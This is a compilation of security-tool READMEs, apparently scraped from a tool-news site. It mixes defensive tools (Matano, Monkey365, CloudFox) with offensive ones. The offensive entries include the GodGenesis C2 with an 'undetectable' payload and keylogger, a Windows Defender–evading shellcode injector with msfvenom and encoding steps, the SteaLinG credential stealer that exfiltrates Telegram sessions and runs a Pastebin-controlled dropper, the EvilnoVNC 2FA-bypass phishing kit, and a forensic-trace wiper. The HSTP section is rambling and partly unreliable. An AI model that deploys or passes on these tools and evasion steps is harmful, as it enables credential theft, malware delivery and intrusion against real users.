Features Of Our Framework:

Check The Video To Get Detailed Knowledge

1. Payload.py is FULLY UNDETECTABLE (FUD); use your own techniques for making an exe file. (Best results when backdoored with some other legitimate application.)
2. Able to perform privilege escalation on any Windows system.
3. FUD keylogger.
4. Two ways of achieving persistence.
5. Recon automation to save your time.

How To Use Our Tool:

git clone https://github.com/SaumyajeetDas/GodGenesis.git

pip3 install -r requirements.txt

python3 c2c.py

It is worth mentioning that Suman Chakraborty has contributed to the framework by coding the FUD keylogger, Wi-Fi password extraction and Chrome password dumper modules.

Don't forget to change the IP address manually in both c2c.py and payload.py.



Matano - The Open-Source Security Lake Platform For AWS


Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless, designed specifically for AWS, and focused on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.


Features

Collect data from all your sources

Matano lets you collect log data from sources using S3 or SQS based ingestion.

Ingest, transform, normalize log data

Matano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema.

Store data in S3 object storage

Log data is always stored in S3 object storage, for cost effective, long term, durable storage.

Apache Iceberg Data lake

All data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in.

Serverless

Matano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling.

Detections as code

Write Python detections to implement realtime alerting on your log data.
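As a sketch of what a detection can look like, here is a minimal Python example (the detect(record) entry point follows Matano's detections-as-code docs, but the field names are illustrative assumptions; check the current documentation for the exact interface):

# detections/failed_console_logins.py (illustrative)
def detect(record) -> bool:
    # Return True to raise an alert for this normalized (ECS) log record
    event = record.get("event", {})
    return event.get("action") == "ConsoleLogin" and event.get("outcome") == "failure"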

Installing

View the complete installation instructions.

You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment.

Requirements

  • Docker

Installation

Matano provides a nightly release with the latest prebuilt files to install the Matano CLI on GitHub. You can download and execute these files to install Matano.

For example, to install the Matano CLI for Linux, run:

curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh

Getting started

Read the complete docs on getting started.

Deployment

To get started with Matano, run the matano init command. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).

The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.


Initial deployment takes a few minutes.

Documentation

View our complete documentation.

License



FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom); for instance, in msfvenom you can do it like so (the payload used here is for illustration purposes; use whatever payload you want):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • XOR-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file xor_crypted_out.txt and paste it into the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt} (a conceptual sketch of this encoding appears after this list)
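For reference, here is a conceptual Python sketch of the XOR-plus-UUID encoding performed by the two helper scripts above (the real bin_to_uuid.py and xor_encryptor.py may differ in detail; uuid.UUID(bytes_le=...) is chosen because UuidFromStringA later writes UUIDs back in their mixed-endian in-memory layout):

import sys
import uuid

KEY = 0x41  # illustrative single-byte XOR key; the real script defines its own

def shellcode_to_uuids(data, xor_key):
    data += b"\x90" * (-len(data) % 16)      # pad with NOPs to a 16-byte multiple
    data = bytes(b ^ xor_key for b in data)  # XOR "encrypt" the padded bytes
    return [str(uuid.UUID(bytes_le=data[i:i + 16]))
            for i in range(0, len(data), 16)]

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        print("\n".join(shellcode_to_uuids(f.read(), KEY)))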

Execution

This shellcode injection technique comprises the following steps:

  • First, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It XOR-decrypts the payload using the XOR key value
  • It uses UuidFromStringA to convert the UUID strings into their binary representation and store them in the previously allocated memory. This avoids the use of suspicious APIs like WriteProcessMemory or memcpy.
  • It uses EnumChildWindows to execute the payload previously loaded into memory (in step 1)

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory, which are known to raise alarms with AVs/EDRs; this program uses the Windows API function UuidFromStringA, which can be used to decode data as well as write it to memory (Isn't that great, folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the XOR key (row 86) to whatever you wish. This can be done in the ./xor_encryptor.py Python3 script by changing the KEY variable.
  • You have to change the default executable filename value (row 90) to your filename.
  • The command for compiling is provided in the C++ file (around the top). NB: MinGW was used, but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.

Disclaimer:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
  • for developers
    you can read the source code and try to understand how to make a project like this

Features


Module | Short description
Dump passwords | Steals all saved passwords and uploads the saved-passwords file to Mega
Dump history | Dumps browser history
Dump files | Steals files from the hard drive with the extension you want

New features

Module | Short description
1 - Telegram Session Hijack | Telegram session hijacker
  • How does it work? The Telegram session is stored locally at C:\Users\<pc name>\AppData\Roaming\Telegram Desktop, in the 'tdata' folder:
C:
└── Users
    └── <pc name>
        └── AppData
            └── Roaming
                └── Telegram Desktop
                    └── tdata

Once you have moved this folder, with all its contents, to the same path on your own device, the session is yours; it is that simple, and the tool does all of this. All you have to do is give it your token from https://anonfiles.com/. The first step is to go to the path where the tdata folder is located and compress it into a zip file. If Telegram is running this would fail, so on any error (meaning Telegram is open) the tool kills the Telegram process. Killing antivirus processes would be flagged as malicious behaviour, so that part is avoided entirely with a try/except in the code. The victim's device name is used as the archive name, in case you have more than one victim. After that, the tool sends a POST request with the zip file to the anonfiles website using the API key (token) of your account on the site, where you will find your token. Just that, and it is not detected by any AV.

Module
2 - Dropper
  • What does it need from you, and how does it work?
    Requirements: the first thing it asks for is the URL of the virus (or whatever you want downloaded to the victim's device). Keep in mind that the URL must be direct, i.e. it must end with a filename such as .exe or .png. The second thing it takes is your Pastebin API key: register, click on API, and you will find it, along with your username and password.

So how does it work? First it creates a private paste on the site and adds the URL you gave it; then it gives you the exe file. When that file runs on any device it starts adding itself to the device registry in two different ways, opens Pastebin, reads the private paste you created, takes the URL from it, downloads its content and runs it. You can enter a new URL at any time: the dropper checks the paste every 10 minutes, and if the URL has changed it downloads and runs the new content, so you can literally reach the device from anywhere.

3 - Linux support

4 - You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 (Download Python)
  • OS: Windows
  • OS: Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

Warning:

* Don't upload it to VirusTotal.com, because then the tool will stop working over time.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!

AV detection


Media



Monkey365 - Tool For Security Consultants To Easily Conduct Not Only Microsoft 365, But Also Azure Subscriptions And Azure Active Directory Security Configuration Reviews


Monkey365 is an Open Source security tool that can be used to easily conduct security configuration reviews of not only Microsoft 365 but also Azure subscriptions and Azure Active Directory, without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.


Introduction

Monkey365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft365 core applications.

Installation

You can either download the latest zip by clicking this link or download Monkey365 by cloning the repository:

Once downloaded, you must extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock the files:

Get-ChildItem -Recurse c:\monkey365 | Unblock-File

Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that Monkey365 is located in the PSModulePath, PowerShell would load monkey365 into active memory:

Import-Module monkey365

If Monkey365 is not located on a PSModulePath path, you can use an explicit path to import:

Import-Module C:\temp\monkey365

You can also use the Force parameter in case you want to reimport the Monkey365 module into the same session

Import-Module C:\temp\monkey365 -Force

Basic Usage

The following command will provide the list of available command line options:

Get-Help Invoke-Monkey365

To get a list of examples use:

Get-Help Invoke-Monkey365 -Examples

To get a list of all options and examples with detailed info use:

Get-Help Invoke-Monkey365 -Detailed

The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.

$param = @{
Instance = 'Microsoft365';
Analysis = 'SharePointOnline';
PromptBehavior = 'SelectAccount';
IncludeAzureActiveDirectory = $true;
ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param

Regulatory compliance checks

Monkey365 helps streamline the process of performing not only Microsoft 365, but also Azure subscriptions and Azure Active Directory Security Reviews.

160+ checks covering industry-defined security best practices for Microsoft 365, Azure, and Azure Active Directory.

Monkey365 will help consultants to assess cloud environments and to analyze risk factors according to controls and best practices. The report will contain structured data for quick checking and verification of the results.

Supported standards

By default, the HTML report shows you the CIS (Center for Internet Security) Benchmark. The CIS Benchmarks for Azure and Microsoft 365 are guidelines for security and compliance best practices.

The following standards are supported by Monkey365:

  • CIS Microsoft Azure Foundations Benchmark v1.4.0
  • CIS Microsoft 365 Foundations Benchmark v1.4.0

More standards will be added in future releases (NIST, HIPAA, GDPR, PCI-DSS, etc.) as they become available.

Additional information, such as installation or advanced usage, can be found at the following link



HSTP - Simple Hyper Service Transfer Protocol On Networks



The protocol aims to develop an application-layer abstraction for the Hyper Service Transfer Protocol.

HSTP is recursive by nature: the protocol implements itself as an interface. On every internet-connected device there is an HSTP instance, which is why adoption is not needed; HSTP is already running on top of the internet. What is new is that we have managed to describe the protocol over other protocols on heterogeneous networks, so do not compare it with web2, web3, or vice versa.

Abstract

HSTP is an application representation interface for heterogeneous networks.

The HSTP interface enforces the implementation of a set of methods needed to communicate with other nodes in the network, so servers, clients, and other nodes can talk to each other in a trust-based, end-to-end encrypted way. For now, node resolution is based on a fastest-path resolution algorithm I wrote; a speculative sketch of such an interface follows below.
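The text never pins down the method set, so the following Python sketch is purely speculative; every method name here is an assumption for illustration, not part of any published HSTP specification:

from abc import ABC, abstractmethod

class HSTPNode(ABC):
    # Hypothetical HSTP-style node interface (illustrative only)

    @abstractmethod
    def status(self):
        # Report this node's health so peers can check system status
        ...

    @abstractmethod
    def resolve(self, node_id):
        # Find the fastest path/address to another node
        ...

    @abstractmethod
    def call(self, node_id, payload):
        # Send an end-to-end encrypted request to another node
        ...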


Protocol 4 Babies

Story time!

  • Baby crying!
  • Needs milk!
  • Mommy has a problem.
  • Father has a problem.
  • Let's fix this!

A small overview

Think about it: we're in a situation where a mother and a father live a happy life, and they have a baby! Suddenly, the mother needs to take pills regularly to cure a disease, but the pill is a poison for the baby. The baby is crying, and the mother calls the father because he is the only trusted person who can help the baby. But the father sometimes cannot stay at home; he needs to do something to feed the baby. The father hears that a milkman has fresh, high-quality milk for a low price. The father decides to talk to the milkman; the milkman delivers the milk to the father, and the father carries the milk to the mother. The mother gives the milk to the baby. The baby is happy now and sleeps, and the mother sees that the baby is happy.

The family has never bought milk from outside; this is the first time they buy milk for the baby. (Mom does not know the milkman's number; the milkman does not know the home address.)

As steps:

0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom sees the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother only trusts the Father.)
4) - Mom calls the father.
5) - Father calls the milkman.
6) - Milkman delivers the milk to father.
7) - Father delivers the milk to mom.
8) - Mom gives the milk to the baby.
9) - Baby drinks the milk.
10) - Baby is happy.
11) - Baby sleeps.
12) - Mother sees the baby is happy and sleeps.
13) - In order to contact the milkman again, the mother asks the father to have the milkman save the address of the house and the mother's mobile phone number.
14) - Mother calls the father.
15) - Father calls the milkman.
16) - Milkman saves the address of the house and the mobile phone of the mother.

Oops, the next day the baby wakes up and cries again:
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom sees the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother trusts that the Father made the right decision in the first place by giving the address to the milkman, and that the milkman made the right decision in the first place by saving the address of the house and the mother's mobile phone number.)
4) - Mother calls the milkman. (Mother is trusting the Father's decision only.)
5) - Milkman delivers the milk to mom.
6) - Mom gives the milk to the baby.
7) - Baby drinks the milk.
8) - Baby is happy.
9) - Baby sleeps.
10) - Mother sees the baby is happy and sleeps.
11) - Mother is happy, and the mother trusts the milkman now.

This document you're reading is a manifest for the people of the internet: connect other people by trusting the service that serves the client, where trust can only be maintained by providing good services. Trust is the key, but it is not enough to survive: the service also has to be reliable, consistent, and cheap; otherwise people will decide not to ask you again.

So, it's easy right? It's so simple to understand, who are those people in the story?

  • Baby is a client.
  • Mom is a client.
  • Father is a client.
  • Milkman is a server.

also,

  • Baby could be a server in [TIME].
  • Mom is a server for baby.
  • Father is a server for mom.
  • Milkman is a server for father.
  • Milkman is a server for mom.

Baby is in trusted hands. Nothing to worry about. They love you, you will understand when you grow up and have a child.

// Technical step-by-step explanation coming soon, but it is not as hard as it looks.

What is a HSTP?

HSTP is an interface: a set of methods that must be implemented by the application layer. The interface is used to communicate with other nodes in the network and is designed for use in heterogeneous networks.

What is a HSTP node?

HSTP shall be implemented on any layer of network connected devices/environment.

An HSTP node could be a TCP server, an HTTP server, a static file, or a contract on any chain. Any HSTP node can call any other HSTP node; thus nodes can call each other freely, check each other's system status, and communicate with each other.

What kind of abstraction layer for networks?

HSTP is already implemented at the language level, by people for people. English is the most widely adopted language on Earth; JavaScript is arguably the most widely adopted language for browser environments; Solidity is for EVM-based chains, hyperbees for TCP-based networks, and so on.

HSTP interface shall be applied between any HSTP connected devices/networks.

  • [Universe] talks to [Universe] via [HSTP]
    • [Kind] universe talks over world.
      • [World] Earth talks with sound frequencies and HSTP.
        • [Country] X sound frequencies on Xish and HSTP.
          • [Community] CommunityX Xish on CommunityXish.
        • [Country] Y talks Yish and HSTP.
        • [Country] Z talks Zish and HSTP.
      • [World] Mars talks with radio frequencies.
        • [Bacteria] UUU-1 talks UUU-1ish and HSTP.
          • Info: UUU-1 can call, universe/kind/world/Earth/X/CommunityX/query
      • [World] Jupiter talks with light frequencies and does not implement HSTP.
        • Info: If the Earth wants to talk with Jupiter, we can add an HSTP proxy for Jupiter at the universe level.
    • [Kind] universe talks over atoms and HSTP.
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query Info: Kind universe can talk with Mars, and Mars also can talk with Kind universe.

What is the purpose of HSTP?

Infinite scaling options: any TCP-connected device can talk with any other TCP-connected device over HSTP. That means any web browser can serve as another HSTP node, and any web browser can call any other web browser.

Uniform application representation interface: HSTP is a uniform interface, which is a set of methods that must be implemented by the application layer.

Heterogeneous networks: any participant of the network is allowed to share resources with other participants. The resources can be CPU, memory, storage, network, etc.

Conjugation of web versions: since blockchain technologies started being called web3, people began discussing the differences between the webs. Comparing them is a mindset inherited from incrementally numbered systems. Which one is better? None of them. We have to build systems that can talk over one uniform protocol, where the underlying services can be anything. HSTP is aiming for that.

What are the components of HSTP?

Registry interface: the registry interface is designed for use on the TCP layer, to register top-level (TLD) nodes in the network. The first implementation of the HSTP TCP relay will resolve hstp/

The registry has two parts of the interface:

  • Register method, which is used to register a new node in the network.
  • Resolve method, which is used to resolve a node in the network.

Registry implementation needs two HSTP nodes (a toy sketch follows the list):

  1. Hyperbees
  • Heterogeneous networks will resolve the registry of RPC, TCP, HTTP, HSTP, etc.
  2. Registry.sol on any EVM-based chain (Ethereum, Binance Smart Chain, Polygon, etc.)
  • Registry.sol will resolve the registry of HSTP nodes, which can be relayed over other networks.
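
A toy sketch of that two-method contract (illustrative only; the real registries are Hyperbees and Registry.sol):

# Toy registry, illustrative only: register() stores a resolver under a
# name, resolve() looks it up; real resolution would traverse the network.
class Registry:
    def __init__(self):
        self._nodes = {}

    def register(self, name, resolver):
        self._nodes[name] = resolver

    def resolve(self, name):
        return self._nodes.get(name)

registry = Registry()
registry.register("todo", "hstp://todo-node")  # hypothetical node locator
print(registry.resolve("todo"))                # -> hstp://todo-node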

Router interface

For demonstration purposes, we will use the following solidity example:

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./HSTP.sol";
import "./ERC165.sol";

enum Operation {
    Query,
    Mutation
}

struct Response {
    uint256 status;
    string body;
}

struct Registry {
    HSTP resolver;
}

// HSTP/Router.sol
abstract contract Router is ERC165 {
    event Log(address indexed sender, Operation operation, bytes payload);
    event Register(address indexed sender, Registry registry);
    mapping(string => Registry) public routes;

    function reply(string memory name, Operation _operation, bytes memory payload) public payable virtual returns (Response memory response) {
        emit Log(msg.sender, _operation, payload);
        // Traverse upwards and downwards of the tree.
        // Tries to find the closest path for the given operation.
        // If the route is registered on this HSTP node, reply from the child node.
        if (address(routes[name].resolver) != address(0)) {
            if (_operation == Operation.Query) {
                return this.query(name, payload);
            } else if (_operation == Operation.Mutation) {
                return this.mutation(name, payload);
            }
        }
        // If this node does not have the route, the intent is to ask the
        // parent; at the root there is no parent, so return an empty 404.
        // (A child contract overriding reply() can forward upwards instead.)
        return Response(404, "");
    }

    function query(string memory name, bytes memory payload) public view returns (Response memory) {
        return routes[name].resolver.query(payload);
    }

    function mutation(string memory name, bytes memory payload) public payable returns (Response memory) {
        return routes[name].resolver.mutation(payload);
    }

    function register(string memory name, HSTP node) public {
        Registry memory registry = Registry({
            resolver: node
        });
        emit Register(msg.sender, registry);
        routes[name] = registry;
    }

    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(HSTP).interfaceId;
    }
}

HSTP interface

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./Router.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
// Will implement: EIP-4337 when it reaches its final stage.
// https://github.com/ethereum/EIPs/blob/master/EIPS/eip-4337.md
abstract contract HSTP is Router {
    constructor(string memory name) {
        register(name, this);
    }

    function query(bytes memory payload)
        public
        view
        virtual
        returns (Response memory);

    function mutation(bytes memory payload)
        public
        payable
        virtual
        returns (Response memory);
}

Example HSTP Node

An HSTP node can call its parent router via the super.reply(name, operation, payload) method. An HSTP node can also call child nodes via the this.query(payload) or this.mutation(payload) methods.

An HSTP node can be a smart contract, a web browser, or a TCP-connected device.

A node is fully capable of adding more HSTP nodes to the network, or to itself as sub-services, as in the tree below.

         HSTP          HSTP
        /    \        /    \
    HSTP      HSTP        HSTP
    /  \
 HSTP   HSTP
   |      |
 HSTP   HSTP
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

    struct ITodo {
        string todo;
    }

    function addTodo(ITodo memory request) public payable returns (Response memory response) {
        response.body = request.todo;
        return response;
    }

    // Override for HSTP.
    function query(bytes memory payload)
        public
        view
        virtual
        override
        returns (Response memory) {}

    function mutation(bytes memory payload)
        public
        payable
        virtual
        override
        returns (Response memory) {
        (ITodo memory request) = abi.decode(payload, (ITodo));
        return this.addTodo(request);
    }
}

Proposal

The Ethereum proposal is currently a draft, but the protocol has a reference implementation, Todo.sol.

Awesome web services running top of HSTP

Full list here

Hello world

You can test HSTP and try it on Remix now.

How to play with the protocol?

  • Copy the source code below into https://remix.ethereum.org/
  • Deploy it on any EVM-based chain.
  • Call the functions and try different network topologies on HSTP.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

    struct TodoRequest {
        string todo;
    }

    function addTodo(TodoRequest memory request) public payable returns (Response memory response) {
        response.body = request.todo;
        return response;
    }

    // Override for HSTP.
    function query(bytes memory payload)
        public
        view
        virtual
        override
        returns (Response memory) {}

    function mutation(bytes memory payload)
        public
        payable
        virtual
        override
        returns (Response memory) {
        (TodoRequest memory todoRequest) = abi.decode(payload, (TodoRequest));
        return this.addTodo(todoRequest);
    }
}
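
Beyond Remix, the deployed contract can also be driven from a script. The following is a hedged sketch using web3.py and eth-abi (both are assumptions, not mentioned above); the RPC URL and contract address are placeholders you would replace after deploying:

# Hedged sketch: ABI-encode a TodoRequest(string) tuple and call mutation().
# web3.py / eth-abi, the RPC URL and the zero address are illustrative only.
from eth_abi import encode        # pip install eth-abi
from web3 import Web3             # pip install web3

w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:8545"))  # local dev chain
todo = w3.eth.contract(
    address="0x0000000000000000000000000000000000000000",  # replace after deploy
    abi=[{
        "name": "mutation", "type": "function", "stateMutability": "payable",
        "inputs": [{"name": "payload", "type": "bytes"}],
        "outputs": [{"name": "", "type": "tuple", "components": [
            {"name": "status", "type": "uint256"},
            {"name": "body", "type": "string"},
        ]}],
    }],
)

payload = encode(["(string)"], [("buy milk",)])  # matches abi.decode(payload, (TodoRequest))
status, body = todo.functions.mutation(payload).call()
print(body)  # -> "buy milk"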

Contribute:

Developer level contribution

  • Write a todo application with HSTP, deploy with remix and test it.
  • Draw example architecture of HSTP (serviceless architecture).

Core level contribution

  • Implement TCP layer HSTP interface on hyperbees, [Universe]
    • hyperbees and HSTP will be the first implementation of HSTP.
    • That will cover the universe phase of networks and bring us a fully decentralized web on HSTP.
  • Implement RPC layer HSTP interface on Solidity [Web3]
  • Implement complex serviceless architecture on HSTP interface with Solidity [Web3]
  • Implement HTTP layer HSTP interface on JavaScript [Web]

Inspirations:

License

GNU GENERAL PUBLIC LICENSE V3

Core Contributors

Author

Cagatay Cali



EvilnoVNC - Ready To Go Phishing Platform


EvilnoVNC is a ready-to-go phishing platform.

Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection.

In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and the entire browser profile, including cookies, saved passwords, browsing history and much more.


Requirements

  • Docker
  • Chromium

Download

It's recommended to clone the complete repository or download the zip file.
Additionally, it's necessary to build the Docker image manually. You can do this by running the following commands:

git clone https://github.com/JoelGMSec/EvilnoVNC
cd EvilnoVNC ; sudo chown -R 103 Downloads
sudo docker build -t joelgmsec/evilnovnc .

Usage

./start.sh -h

_____ _ _ __ ___ _ ____
| ____|_ _(_) |_ __ __\ \ / / \ | |/ ___|
| _| \ \ / / | | '_ \ / _ \ \ / /| \| | |
| |___ \ V /| | | | | | (_) \ V / | |\ | |___
|_____| \_/ |_|_|_| |_|\___/ \_/ |_| \_|\____|

---------------- by @JoelGMSec --------------

Usage: ./start.sh $resolution $url

Examples:
1280x720 16bits: ./start.sh 1280x720x16 http://example.com
1280x720 24bits: ./start.sh 1280x720x24 http://example.com
1920x1080 16bits: ./start.sh 1920x1080x16 http://example.com
1920x1080 24bits: ./start.sh 1920x1080x24 http://example.com

The detailed guide of use can be found at the following link:

https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc

Features & To Do

  • Export Evil-Chromium profile to host
  • Save download files on host
  • Disable parameters in URL (like password)
  • Disable key combinations (like Alt+1 or Ctrl+S)
  • Disable access to Thunar
  • Decrypt cookies in real time
  • Expand cookie life to 99999999999999999
  • Dynamic title from original website
  • Dynamic resolution from preload page
  • Replicate real user-agent and other stuff
  • Basic keylogger

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

Original idea by @mrd0x: https://mrd0x.com/bypass-2fa-using-novnc
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



AoratosWin - A Tool That Removes Traces Of Executed Applications On Windows OS

AoratosWin is a tool that removes traces of executed applications on Windows OS which can easily be listed with tools such as ExecutedProgramList by Nirsoft.

(Feel free to decompile, reverse, redistribute, etc.)


Supported OS (Tested On)

  • Windows 7 (x86, x64)
  • Windows 8 (x86, x64)
  • Windows 8.1 (x86, x64)
  • Windows 10 (x86, x64)
  • Windows 11 (x64)

Minimum System Reqs:

  • .NET Framework 4.0

Disclaimer

Any actions and/or activities related to this tool are solely your responsibility.



Cloudfox - Automating Situational Awareness For Cloud Penetration Tests


CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

  • What regions is this AWS account using and roughly how many resources are in the account?
  • What secrets are lurking in EC2 userdata or service specific environment variables?
  • What actions/permissions does this [principal] have?
  • What roles trusts are overly permissive or allow cross-account assumption?
  • What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
  • What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
  • What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but its purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka objective-based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Provider     CloudFox Commands
AWS          15
Azure        2 (alpha)
GCP          Support Planned
Kubernetes   Support Planned

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

  • AWS CLI installed
  • Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
  • A principal with one of the recommended policies attached (described below)
  • Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Policy Notes
CloudFox custom policy Has a complete list of every permission cloudfox uses and nothing else
arn:aws:iam::aws:policy/SecurityAudit Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy.
arn:aws:iam::aws:policy/ReadOnlyAccess Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive.
arn:aws:iam::aws:policy/AdministratorAccess This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :)

Azure

  • Viewer or similar permissions applied.

Supported Commands

Provider Command Name Description
AWS all-checks Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start.
AWS access-keys Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to.
AWS buckets Lists the buckets in the account and gives you handy commands for inspecting them further.
AWS ecr List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection.
AWS endpoints Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc.
AWS env-vars Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, and Sagemaker are supported). If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to it.
AWS filesystems Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec2:RunInstances but not iam:PassRole.
AWS iam-simulator Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should always also use pmapper.
AWS instances Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration.
AWS inventory Gain a rough understanding of the size of the account and the preferred regions.
AWS outbound-assumed-roles List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts.
AWS permissions Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating.
AWS principals Enumerates IAM users and Roles so you have the data at your fingertips.
AWS role-trusts Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service.
AWS route53 Enumerate all records from all route53 managed zones. Use this for application and service enumeration.
